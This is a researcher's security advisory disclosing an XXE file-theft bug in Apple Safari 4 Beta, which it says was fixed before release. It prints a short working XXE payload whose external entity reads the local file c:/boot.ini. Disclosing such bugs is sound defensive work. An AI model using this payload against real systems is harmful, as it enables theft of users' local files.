CESA-2009-007 - rev 1

[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

Apple Safari 4 Beta local file theft bug

This bug is a bonus addendum to this unpleasant XXE-based file theft attack. It is another Safari XXE attack that my colleague Carlos Pizano initially suggested might be possible based on the Chrome sandbox preventing network libraries being loaded. So full credit to Carlos for getting me to look into this further. All I did was create a file-stealing test case for Safari 4 Beta.

The great news here is that Apple responded swiftly to fix this in time for Safari 4 final. Therefore, best I know, this bug never hit a production release browser. (Safari 3 is unaffected because the cause of the bug seems to be a Webkit-based regression in more recent versions of Webkit).

Here's the simple attack code. We just need to serve it with XML MIME type. As can be seen, it's a much simpler XXE attack vector:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///c:/boot.ini"> ]>
<root>
<element>Gimme ur filez?</element>
<element>&ent;</element>
</root>

Demo

Click here for Safari 4 Beta / Windows

Credits

• Carlos Pizano - who initially noted strange behaviour in the context of the Chrome sandbox shutting a network-based XXE sample file down hard.
• Google - researched further on Google's time. Be aware that nothing on my personal pages or blog represents Google... obviously.